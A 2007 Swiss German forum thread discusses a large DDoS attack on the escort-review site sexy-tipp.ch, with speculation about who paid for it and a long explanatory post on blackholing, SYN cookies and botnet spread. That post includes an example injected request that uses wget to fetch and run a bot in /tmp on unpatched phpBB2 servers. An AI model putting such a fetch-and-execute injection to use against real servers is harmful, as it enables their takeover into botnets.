DDOS Angriff auf Sexy-Tipp.ch

@Mod

Du schriebst:

QUOTE Es gibt Unterschiedliche Domainnamen, welche auf die IP 212.243.222.232 zeigen. Einer davon ist sexy-tipp.ch oder sexy-tip.ch aber auch 7teens.ch. Der Domaininhaber von 7teens.ch ist die Webline GmbH


Wo du recht hast, hast du recht. Sexy-Tipp gehörte tatsächlich der Webline GmbH und wurde verkauft. - Das ist keine Vermutung, sondern eine gesicherte Information.


 
@Nik

Lieber Nik,

freut mich - ich bin geehrt - dass meine postings Dich zuweilen zur Selbstreflektion bringen.
Woher aber willst Du wissen, dass mein Bauch gut entwickelt ist ?
Aha..!...; erst jetzt merk ich's (he,he,he), Du hast wohl gemeint, dass ich über eine gut entwickelte Intuition verfüge.... Akzeptiere ich gerne, so lang diese nicht als Synonym für blühende Phantasie verstanden wird.

Spass beiseite, da magst Du mit der Intuition vielleicht recht, haben, zumindest im Fall dieser ST-Marginalie, denn meine Vermutungen um diese Angelegenheit haben sich mehr oder minder bestätigt, aber: so what ?

Tatsache ist, dass das ST-Forum noch immer am gleichen Übel krankt und weiterhin so massiv bombardiert wird, dass es nicht funktionieren kann.
Dass da wohl eine Profibande von kommerziell ausgerichteten Computerfreaks dahintersteckt, die sich von einem gut betuchten Auftraggeber fürstlich honorieren lässt (und dies fraglichem Auftraggeber auch wert sein muss), dürfte mittlerweile auch klar sein.
Ebenso evident ist, dass da keine schweizerische religiöse Fundis dahinterstecken, zumal denen im Unterschied zu ihren amerikanischen Kollegen und den katholischen Exklusivfundis des Opus Dei dazu einfach das nötige "Kleingeld" fehlt.

Wenn wir nun davon ausgehen, dass der Angriff auf Sexy Tipp seinem (vermutlichen)Besitzer Globe - hallo realchat ! -gilt, ja dann kann man ja eins und eins zusammenzählen, wer einen solchen Angriff lanciert haben könnte.
Jedem, der schon am Zürcher Flughafen eingecheckt hat und die Augen zuvor offen gehalten hat und dabei schönen monumental gross gezeigten Frauenbeinen nicht abhold ist, ja dem wird's wohl allmählich dämmern...
Vielleicht ist in dem Punkt meine Intuition Phantasie geworden, aber trotzdem so als Arbeitshypothese, wäre das mindestens nicht abwegig....

Wenn sich's also um einen Milieukriege handelte - oh hätten wir nur Kriege dieser Art, der Weltglobe wäre ein so viel angenehmerer Ort! - ja , dann muss ich Deine Kritik an meinem auf die Behörden bezogenen Vergleich der sich die Augen nie aushackenden Raben zurückweisen.

Die Mitglieder einer Behörde sind mehr oder minder harmonisch im gleichen Boot sitzende, und mal in ruhigen und mal etwas bewegteren Wassern vor sich hin dümpelnde oder mal stärker rudernde Menschen. Die übergeordnete Instanz - das Boot - ist der Kanton oder Staat, also eine Einheit mit gemeinsamen Zielen. Dort macht es keinen Sinn sich innerhalb gleicher Interessen zu bekriegen.
Anders steht es mit Bezug auf die Milieukrieger. Dort ist nicht das Milieu der "Staat", sondern nur übergeordneter Begriff für die Gesamtheit einer Berufsgattung. Jeder Puffbesitzer ist ein eigenes Boot mit eigenen Seemännern resp. Seefrauen und eigenen Zielen, und diese Raben kratzen sich nun sehr wohl die Augen aus, denn die Kapitäne stehen in Konkurrenz zueinander und da verkeilen sich halt die griechischen Galeeren mit jenen der Perser.

Aber der ganze Kram um Sexy Tipp ist an sich eher belanglos, insbesondere die Frage nach der Weiterexistenz dieses Forum oder eben nicht.

Bedenklicher - und da gebe ich Dir Nik recht - ist die Tatsache, dass da organisierte und profimässig agierende Internetbanditen ungestört und munter ihr Unwesen treiben können und grosse Organisationen wie Swisscom dagegen ziemlich machtlos sind.
Ich unterstelle diesem Unternehmen und deren Technikern nicht, dass sie da bloss untätig und unfähig zuschauen, aber ich habe so das Gefühl, dass die da trotz eines sicherlich grossen technischen und personellen Aufwands köpfeschüttelnd wie die Esel am Berge stehen. keine Frage, irgendwann werden sie das wieder hinkriegen, aber die nächsten Netzpiraten - es ist nunmehr offenbar ein lukratives Geschäft geworden - stehen sicher an anderer Stelle und in einem anderen Zusammenhang bereits vor der Türe - und das mit einem noch ausgetüfftelteren System.
Wohin das führen wird weiss ich nicht, denn ich kenne mich in solchen Dingen etwa so gut aus wie ein Velomech in Astrophysik. Aber es kommt so ein ungutes Gefühl auf.

Wenn das Problem um Sexy Tipp - nicht in der Frage "ST oder nicht ST ?", das interssiert doch keinen - sondern auf der Ebene der Technik und der Sicherheit im Netz öffentlich thematisiert würde, namentlich von den hier involvierten Stellen, wäre das begrüssenswert. Allerdings gilt zu bedenken, dass damit ein Prestigeverlust und demzufolge auch eine Einbusse im Markt abzusehen wäre, folglich.................

Gruss
Galeotto
 
Hi Galeotto,

Das kann ich getrost stehen lassen!

Ich selber nehme mir jetzt ein paar Tage Auszeit.

Liebe Grüsse
Nik
 
Ich habe folgendes in Erfahrung gebracht:

Die ST-Angriffe sind kein Fake, Sexy-Tipp wird tatsächlich von etwa einer Million Zombies angegriffen, sobald der DNS-Eintrag jeweils wieder aktiv ist. So einen Angriff zu organisieren kostet etwa tausend Dollar im Tag. Von mir aus gesehen gibt es da nicht viele Kandidaten, die so lange so viel Geld aufbringen können. - Doch wo kein Beweis ist, kann zwar eine Anzeige gegen Unbekannt, aber keine Anklage erfolgen.

Sexy-Tipp wird entweder diese Woche wieder aufgeschaltet werden, oder, sollte dies wiederum schief gehen, zu einem sehr grossen Provider in den USA wechseln, um die Domäne zu hosten. Doch wird Sexy-Tipp so oder so wieder kommen, die Frage ist nur wann!

Die Swisscom hat es nicht ganz einfach, weil alle anderen Provider, insbesondere die nicht mehr schweizerische Cablecom, sich geweigert haben irgend etwas zu unternehmen. Für Swisscom ist es eine gute Gelegenheit Know-How zu gewinnen, denn in Zukunft wird es matchentscheidend sein, wer solche Angriffe im Griff haben wird.

Das grosse Problem ist, dass bei solchen Angriffen oft keine Bandbreite mehr vorhanden ist, um zu antworten, obwohl die vielen Anfragen den Server nicht zu Boden bringen würden. Das erinnert mich übrigens an eine Aussage von jAuer, der die Server unbehelligt vorgefunden hatte, obwohl sie nicht mehr erreichbar gewesen waren.

jAuer schrieb:
QUOTE Bei HostEurope gab es im März 2006 mal einen DDOS-Angriff gegen das gesamte HE-Netzwerk (eine Notiz steht in meinen News). Da war kein Server mehr von außen her erreichbar. Der spätere Blick auf die Server zeigte, daß die alle unbehelligt vor sich hingegluckert haben - es war also tatsächlich bloß ein DDOS.
 
Was spricht gegen eine Filterung der Requests aufgrund der IP-Adresse?

Könnte man Requests von nicht-schweizer IPs nicht schon auf Routerebene blocken?
Gibt es da technische Probleme so etwas zu machen?


Denn dieses Vorgehen würde die Seite aus der Schweiz wieder erreichbar machen, und somit auch den Angriff sinnlos machen. Dieser würde dann wahrscheinlich eingestellt werden.
 
@PH

Ich selber verstehe zu wenig davon. Ich bin erst auf dem Weg mir Wissen anzueignen. Doch ist es offenbar so, dass die Swisscom so eine Filterung macht, aber die Cablecom und andere grosse Schweizer Provider sich nicht um das Problem kümmern und somit über diese Provider immer noch genug Datenpakete reinkommen, um die Bandbreiten Richtung Deutschland und Italien massiv zu schmälern. Zwar hat Swisscom im Ausland „Blackholes“ eingerichtet, aber damit kann nicht alles abgefangen werden, was da kommt – und die Angriffe galten danach speziell den IP-Plus-DNS', was den Totalausfall bewirkte.

Es spricht sehr für die Swisscom, dass sie sich explizit zur Verfügung gestellt hat, diesen Grossangriff abzuwehren. Man kann so die Beta-Version eines Abwehrkonzepts testen und massiv verbessern. Ich denke, dass der Know-How-Gewinn, den Swisscom dadurch hat, ein grosser Wettbewerbs-Vorteil sein wird. - Doch denken, von aggressiven Auslandfirmen übernommene, CH-Firmen wahrscheinlich generell nur kurzfristig, man sieht es ja auch darin, wie Cablecom den Kundendienst vernachlässigt.
 
Ich selber habe nicht alles ganz genau verstanden, von dem ich erfahren habe. Und dies trotz expliziter Rückfrage. Es wäre nett, wenn uns jemand von euch Techniker(innen) folgendes etwas näher erklären könnte:

Was sind "Blackholes" im Ausland. Ich weiss schon, dass es schwarze Löcher sind, die die "falschen" Datenpakete irgendwie "reinziehen" und nicht mehr weiterleiten. Aber wie und wo macht man das? Sind das Konfigurationen auf zentralen Routern?

Wieso ist die Swisscom darauf angewiesen, dass ihre Mitkonkurrenten die "falschen" Datenpakete ebenfalls rausfiltern, kommt denn nicht der ganze Datenverkehr über einen Swisscom-Router, der dann die Filterung zum angegriffenen Server vornimmt. Oder ist das Problem eben, dass die Bandbreiten der Swisscom oder zwischen den verschiedenen Ländern zu sehr geschmälert werden. Doch würde ich auch das nicht verstehen, es gibt doch Firewalls oder Switches, die die Bandbreiten für den Verkehr zu einer bestimmten Domäne beschränken. Ein Beispiel: Ich besitze einen Internet-Anschluss und habe Bluewin-TV; beide Systeme hängen bei mir am gleichen Hub/Switch, haben jedoch unterschiedliche Bandbreiten.

Wenn ich etwas „gescheiter“ wäre, dann könnte ich mein Wissen über den Angriff vielleicht noch etwas besser einfliessen lassen, weil ich im Nachhinein verstehen würde und einordnen könnte. Ich danke euch daher im Voraus für eure Beiträge.
 
Blackholes werden bei angrenzenden ISP (Backbone Providers) eingerichtet. Die Swisscom kann per BGP (Border Gateway Protocol) die Router hinter ihren Backbone Eingängen konfigurieren. Somit muss Swisscom nun nicht mehr ihre Bandbreiten Provider kontaktieren um eine IP Sperre einzurichten, dieses System funktioniert automatisch.

Grundsätzlich ist ein Blackhole im Netzwerk-Jargon ein Router welcher das Packet "leise Verwirft". Normalerweise würde der Router per ICMP mitteilen, warum die Anfrage nicht erfolgreich war (keine Route, kein Service, etc.).

Professionelle Router sind fähig den Traffic auf mehreren Ebenen zu filtern. Somit können nicht nur simple IP Blockaden implementiert werden, sondern spezifische Filter erarbeitet werden. Dadurch kann der Router z.B. selektiv anhand des HTTP Requests, Cookies, User-Agent, URL, usw., den Traffic Blockieren (Droppen, Null-Routen). Solche Router sind nicht Billig, weshalb man für eine 100 MBit Backbone Leitung (ISPs wie die Swisscom haben mehrere Bandbreiten Provider) keinen Router kauft der für mehrere GBit ausgelegt ist (Kosten/Nutzenfrage). Jedoch benötigt die Filterung des Traffics nicht unerheblich CPU und Speicher, speziell wenn die Packete sehr genau inspiziert werden sollen. Deshalb ist es für die Swisscom von grossem Interesse, diese Filterung gleich bei ihren Backbone Providern durchzuführen. Ich denke das dies soweit geht, das nun z.B. der Backbone Provider (wie z.B. switch) diese Filter in ihrem "internen" Netz (siehe link zu Switch) auf alle Router verteilt, welche Traffic von "aussen" bekommen. Dadurch kann sich die "Switch" sehr viel "internen" Traffic ersparen, und eine Leitung von Genf nach Zürich ist auch nicht gerade Billig. Ich kenne das BGP nicht genau, doch IMO sollte es machbar sein, diese Filter noch weiter, über die grenzen von Switch hinaus zu installieren (solange der Filter auf die spezifischen IP-Destination-Ranges des anfordenden ISP beschränkt werden, ansonten bestünde die Möglichkeit das Traffic bei anderen Kunden des Backbones falscherweise Blockiert würde). Die Filterung wird wohl jedoch kaum oft sehr weit gehen, da es wohl ab einer gewissen Stufe keinen Sinn mehr macht, wenn der Filter denn seine Wirkung tut. Sobald bei einem Router mit Filter die Belastung nicht zu gross ist, wird man sich kaum noch bemühen die Filterung weiter "nach hinten" zu verschieben.

QUOTE ... es gibt doch Firewalls oder Switches, die die Bandbreiten für den Verkehr zu einer bestimmten Domäne beschränken. Ein Beispiel: Ich besitze einen Internet-Anschluss und habe Bluewin-TV; beide Systeme hängen bei mir am gleichen Hub/Switch, haben jedoch unterschiedliche Bandbreiten.


Wie das Bandbreiten Management (QOS=Quality of Service) auf deiner Seite bei der Swisscom geschieht, weiss ich nicht. Eine einfache Lösung die mir einfallen würde, wäre eine Ausnahme im Traffic Shaping auf eine spezielle Ziel-IP (oder Range), von welcher aus die TV-Daten geliefert werden. Wenn ich das richtig verstanden habe, schliesst du die TV-Anlage ja per Ethernet/DHCP hinter den ADSL Router!?


QUOTE Bei gefälschten IP's würde das SYN-Handshake nicht mehr funktionieren, was dann den Speicher zum Überlauf bringen würde. Doch nehme ich an, dass man genau so die gespooften Adressen erkennen und danach eliminieren könnte.


Gespoofte IPs werden heute nur noch als Bandbreiten Verstopfer eingesetzt. Seit der Einführung von SYN-Cookies benötigen halb offene Verbindungen keinen Speicher mehr. Beim Linux Kernel muss man dies jedoch explizit auswählen (Keine Ahnung wieso das nicht default mässig gesetzt ist). Beim TCP-Handshake wird zuerst die SEQ (Sequence, als nummerischer Wert) übertragen, danach sendet der andere Host ACK=SEQ+1 (ACK="Antwort") zurück. Früher hatten die Systeme eine SYN-Warteschlange. Der IP-Stack musste sich ja merken, welche Nummer er gesendet hatte, um zu überprüfen ob der Host auch genau ACK=SEQ+1 zurück gesendet hat. Mit SYN-Cookies wird kryptographisch die initiale SEQ Nummer generiert. Wenn nun ein Host eine ACK Nummer zurück sendet, rechnet der IP-Stack diese minus eins und kann aus dem Wert verifizieren, das der Host von ihm initial kontaktiert wurde (also kein "man in the middle" ist).

Bei TCP ist dies die einzige Konsequenz. Mit gespooften IP Adressen kann man keine URL auf einem Webserver aufrufen, da man nicht über den TCP-Handshake hinauskommt. Bei UDP Services (z.B. DNS) sieht dies etwas anders aus. Daten mit gespooften Adressen erleben über TCP nur den IP-Stack, UDP Packete werden jedoch ohne "Prüfung" an die Applikation weiter gereicht. Solche Attacken können sehr viel Ressourcen verbrauchender sein, da die Anfrage effektiv verabeitet und beantwortet wird. Jedoch gibt es nur noch sehr wenige "wichtige" Services per UDP.

Man benötigt zudem unter Linux root Rechte um auf IP-Stack Ebene Packete selber zu generieren (mit gefälschter Absender IP) und zu versenden. Ich hoffe das ist bei Windows genaus so (glaube bei XP Home war es nicht so).

Dazu kommt, das schon einige (viele?) ISPs egress filter betreiben. Damit wird Traffic, der auf einem Port ihrer Router reinkommt, gedroppt, sollte er nicht mit einer IP versehen sein, die an diesem Port verbunden ist. Man kann damit also nur noch Packete mit einer absender IP-Adresse versenden, welche man auch wirklich per DHCP bezogen hat.

Bot-Netze werden sehr gerne auf Webservern installiert, auf denen ungepatchte Software läuft (bekanntes Beispiel phpBB2, Mambo, etc.). Mietet man sich Webspace, dann erwartet man auch php, perl, cgi, etc. (evtl. sogar ssh). Dazu gehört z.B. das man unter php auch eine "externe resource" downloaden kann. Es gibt ISPs die damit sehr restriktive Umgehen, jedoch benötigt das viel mehr administrativen Aufwand. Als Tipp kann ich dazu nur sagen, das man tmp Verzeichnisse immer nur "non-executable" mounten soll. Wenn Applikation ein tmp benötigen wo sie Dateien Ausführen können, muss man halt diese explizit erstellen und konfigurieren. Bei den phpBB2 hacks wurden meist per "URL Buffer Überlauf" Scripte ins tmp Verzeichniss geladen und ausgeführt. Diese haben wiederum ein Script heruntergeladen (zumeist ein veränderter IRC client in Perl). Dieses Script verbindet sich mit dem Bot-Netz über IRC. Früher hatten einige einen expliziten Server per IP Adresse als IRC-Server im Code drin. Somit war es nicht ganz unmöglich diese Leute zu finden, wenn man Zugriff auf diesen einen Server bekam. Es ist allerdings nur eine Frage des programmiertechnischen Geschicks, wie weit man das ganze Verschleiern kann.

Bot-Netze vergrössern sich zumeist auch selbständig. Hier ist eine beliebte Methode das Scannen von IP-Subnetzten, welche ähnlich der eigenen öffentlichen IP sind, um nach allfällig default mässig installierten Applikation, welche einen Angriff zu lassen, zu suchen. Dabei wird ein präparierter request (z.B. h**p://host/phpBB2/dl.php?file='´wget url /tmp/bot && /tmp/bot´') gesendet. Fals genau dort eine ungepatchte Version (ohne erweiterte Sicherheit beim tmp Verzeichniss) installiert ist, wird der Host ins Bot-Netz "assimiliert". Eine erweiterte Moglichkeit ist nach der "verwundbaren" PHP Datei via Google zu suchen, um gezielt die "möglichen Opfer" auszuwählen.

Als (begrenzter) Schutz kann die Firewall auch auf Ausgehende Verbindungen beschränkt werden. Dies bringt jedoch auch erhöhten administrativen Aufwand und kann umgangen werden. Normalerweise würde man, wenn man nicht alles Blockieren will was nach aussen geht (z.B. downloads), den Port 80 (Outgoing) für WWW Services auf machen. Ein intelligentes Bot-Netz kann sich dies jedoch zunutze machen, indem es selektiv nur Bot-Nodes alls Fallback-Server aussucht, auf denen noch kein Service auf Port 80 läuft.

Ich beschäftige mich schon etwas länger mit Linux und betreibe ein paar webserver (zuhause über cablecom, sowie zwei root-server in einem RZ). Ich hatte schon phpBB2 Hacks (Bot-Netz) oder DDOS (wegen falschkonfigurationen). Als Hosting Anbieter stelle ich die Möglichkeit für PHP Applikationen zur Verfügung, ich kann jedoch nicht kontrollieren, ob nun alle Kunden die neuesten Versionen installiert haben. Ich kann einzig auf den ausgehenden Traffic achten und auf die Prozessor- und Speicher-Auslastung. Solange dies im grünen Bereich ist, bin ich nicht beunruhigt. Ich checke dazu noch alle paar Wochen die Prozess-Liste, dadurch ist mir auch das mit dem phpBB2 Hack aufgefallen. Es hat mich als Admin also auch nicht ganz verschont; knapp 1 Woche habe auch ich meinen Server unfreiwillig zum Spammen zur Verfügung gestellt. Ich habe daraus jedoch meine lehren gezogen.

Ich glaube dass mit den beschriebenen Einstellungen heute 50% weniger Bots existieren würden. Es ist jedoch ein Katz- und Maus-Spiel. Man muss sich verdammt Gut informieren und es ist eine heiden Arbeit alles korrekt zu konfigurieren. Das Grundproblem sind die Sicherheitslücken in Betriebssystemen und zumeist (PHP) Web-Applikationen. Dadurch enstehen erst die gewaltigen Bot-Netze. Solange dieses Problem besteht, werden wohl auch die Probleme mit DDOS-Attacken nicht verschwinden.

Sorry, das ist jetzt wirklich etwas viel geworden; hoffe es ist verständlich genug um etwas Klahrheit zum Thema DDOS beizutragen.

Gruss, Maurice
 
Vielen Dank Maurice,

Du hast dich ja extrem ins Zeug gelegt! Aber das erschlägt mich, ich muss es erst sichten, bevor ich überhaupt etwas dazu sagen kann! Doch scheint mir die Netzwerktechnik auf dieser Ebene ein sehr intreressanter Bereich der Telematik zu sein!
 
Hallo Leute

Es wird ja viel über Sexytipp.ch geschrieben und dass andere Seiten eh besser wären.
Nur ist es so dass ich nur Sternchen sehe statt die alternativen Links.
Die echten Links filtert bestimmt der Moderator des Boards aus. Werbung und Konkurenz sind halt nicht gern gesehen ;-)

Hätte ja gerne den einen oder andern User per PN oder Mail gefragt. Ich bin ja so ein Greenhord dass ich nicht mal fas darf. Hoffentlich geht meine Frage nicht ins Nirwana sondern ins Board.
Mit etwas Glück kriege ich vielleich so die interessanten Links. SexyTipp.ch fehlt schon.

Grüsse und schönen Tag noch
 
Es wäre sehr schade, wenn das Management der Swisscom beschliessen würde, die Finger jetzt doch von diesem heissen Eisen Sexy-Tipp zu lassen. Da es sich offenbar wirklich um einen historisch gesehen gewaltigen Angriff handelt, wäre eine Kapitulation sowohl für das Image, als auch für das Know-How von Swisscom schlecht. Ich meine, dass ein gutes Know-How im Bereich DDoS-Angriff in Zukunft matchentscheidend sein wird.

Doch ist es ebenfalls wichtig, dass wir hier in der Schweiz die Bandbreiten massiv erhöhen. Dies wurde evtl. etwas verschlafen. Zu kleine Bandbreiten machen DDoS-Angriffe noch effektiver, als sie ohnehin schon sind.
 
Hier noch eine Mitteilung bezüglich des Verhaltens des Bundesamtes für Polizei. Es ist diesem Bundesamt offenbar bewusst, was für Gefahren aus dem Internet auf unsere moderne Dienstleistungsgesellschaft lauern, und man sucht tatsächlich auch aktiv im Internet nach deliktischen Vorgängen (dazu gehören selbstverständlich auch DDoS-Angriffe). Ich war mir nicht sicher, ob dies so sei und finde das super! Da ist eine Behörde tatsächlich "auf Draht". - Meine Forderung war daher bereits erfüllt!

Offenbar hat nicht nur unsere Armee diese, in meinen Augen grosse Gefahr erkannt, sondern auch das Eidgenössische Justiz- und Polizeidepartement. Die KOBIK, Koordinationsstelle zur Bekämpfung der Internet-Kriminalität www.kobik.ch, dient übrigens auch als Anlaufstelle zur Meldung verdächtiger Internet-Inhalte jeder Art.
 
QUOTE (netpilots @ Sa 6.10.2007, 16:55) Hallo Leute

Es wird ja viel über Sexytipp.ch geschrieben und dass andere Seiten eh besser wären.
Nur ist es so dass ich nur Sternchen sehe statt die alternativen Links.
Die echten Links filtert bestimmt der Moderator des Boards aus. Werbung und Konkurenz sind halt nicht gern gesehen ;-)

Hätte ja gerne den einen oder andern User per PN oder Mail gefragt. Ich bin ja so ein Greenhord dass ich nicht mal fas darf. Hoffentlich geht meine Frage nicht ins Nirwana sondern ins Board.
Mit etwas Glück kriege ich vielleich so die interessanten Links. SexyTipp.ch fehlt schon.

Grüsse und schönen Tag noch

Auch ich würde herne mehr dieser links bekommen!
Respektive nicht nur die sternchen sehen:)

würde mir auch jemand eine PN schrieben? Danke
 
bereits seit wochen informiere ich mich fast täglich darüber, was hier über sexy-tipp.ch geschrieben wird und warte sehnlichst auf die wiederaufschaltung der site. leider habe ich von informatik und dergleichen nicht sehr viel ahnung, weshalb mir viele eurer beiträge spanisch vorkamen. ich glaube jedoch, ein bisschen was habe ich nun bestimmt dazu gelernt.
sexy-tipp.ch war für mich immer eine sehr informative site, welche ich zur planung gewisser ausflüge, geschäftsreisen etc immer wieder gerne zu rate gezogen habe.

kann mir jemand mitteilen, wo ich sowas ähnliches wie sexy-tipp.ch finde? es wäre wirklich sehr schade, wenn eine site von diesem umfang plötzlich einfach vom erdboden verschwunden wäre und ich hoffe, die swisscom wird irgend eine möglichkeit zur rettung finden.

vielen dank für eure vielen infos und nun hoffentlich auch ein paar links
tongue.gif
 
QUOTE (elchegue @ Di 9.10.2007, 14:10)bereits seit wochen informiere ich mich fast täglich darüber, was hier über sexy-tipp.ch geschrieben wird und warte sehnlichst auf die wiederaufschaltung der site. leider habe ich von informatik und dergleichen nicht sehr viel ahnung, weshalb mir viele eurer beiträge spanisch vorkamen. ich glaube jedoch, ein bisschen was habe ich nun bestimmt dazu gelernt.
sexy-tipp.ch war für mich immer eine sehr informative site, welche ich zur planung gewisser ausflüge, geschäftsreisen etc immer wieder gerne zu rate gezogen habe.

kann mir jemand mitteilen, wo ich sowas ähnliches wie sexy-tipp.ch finde? es wäre wirklich sehr schade, wenn eine site von diesem umfang plötzlich einfach vom erdboden verschwunden wäre und ich hoffe, die swisscom wird irgend eine möglichkeit zur rettung finden.

vielen dank für eure vielen infos und nun hoffentlich auch ein paar links
tongue.gif


zur Zeit ist die beste Alternative
>> Domain von Moderator gelöscht <<
 
Ich persönlich finde das >> Domain von Moderator gelöscht << besser. Hat auch schon viel mehr Beiträge und ist offener und schneller in der Komunication. Dazu haben sie noch einen chat, da habe ich mir schon einige gute Tipps von anderen Usern holen können.

Gruss Mister X
Der natürlich den ST auch vermisst, das heisst eher die Datenbank
 
nun ich habe das ganze gelesen und mußte mir ein Grinsen starkt verkneifen.
Klar gibt es solche Attacken aber die dauern nicht über einen Monat!
Klar kann jemand auch pleite gehen aber meistens wird dann die Domain noch verkauft.
Und überaus amüsant fand ich wie die Mitbewerber sich gleich draufgestürzt haben wie die Aasgeier und versucht haben hier Werbung zu machen.

Hier ist irgend etwas faul keine Frage ob finanziell oder aus internen Firmenstreitigkeiten das geht uns alle eigentlich nichts an oder zahlt ihr etwas für die Nutzung?


Wenn Sexy-Tipp nicht mehr aufmacht wird es wohl einen Nachfolger geben schade wäre es auf jeden Fall aber das ganze hier ändert sowieso nichts an der Tatsache also lasst euch überraschen.

PS: ich selbst habe versucht Sexy-Tipp telefonisch zu erreichen leider ohne Erfolg falls die Betreiber hier jetzt mitlesen wäre eine Mail an mich super eventuell finden wir ja eine Lösung.
Ich würde gerne helfen oder notfalls auch das Projekt übernehmen.

Falls meine Adresse hier nicht gepostet werden darf bitte einfach löschen: info@fr-sex.de

 
oldboy
ist das nun domain-vom-moderator-geloescht.ch oder . com?
wink.gif


mich würde der link auch interessieren. geht aber wohl nur per mail.
 
Hi

Ich war auch oft auf sexy-tipp.ch. Schade dass es nicht mehr funktioniert. Ich sehe, hier wurden überall Domain-Namen ersetzt. Kann mir jemand diese Domains per Mail senden? Wäre sehr dankbar. Denke nämlich nicht, das sexy-tipp noch einmal aufgeschaltet wird.

Gruss
 
Hallo miteinander

Hier scheinen ja einige im Board, die sexy-tipp.ch kennen. Wenn ich das alles so lese, glaube ich auch nicht mehr an ein revival von sexy-tipp. Vielen Dank an all diesbezüglichen poster/Informanten.

So wie andere wohl auch kenne ich in der CH eigentlich keine Alternativen. Wäre sehr nett, wenn mir was gemailt werden könnte.

Vielen vielen Dank im voraus
Silberrücken
 
Zurück
Oben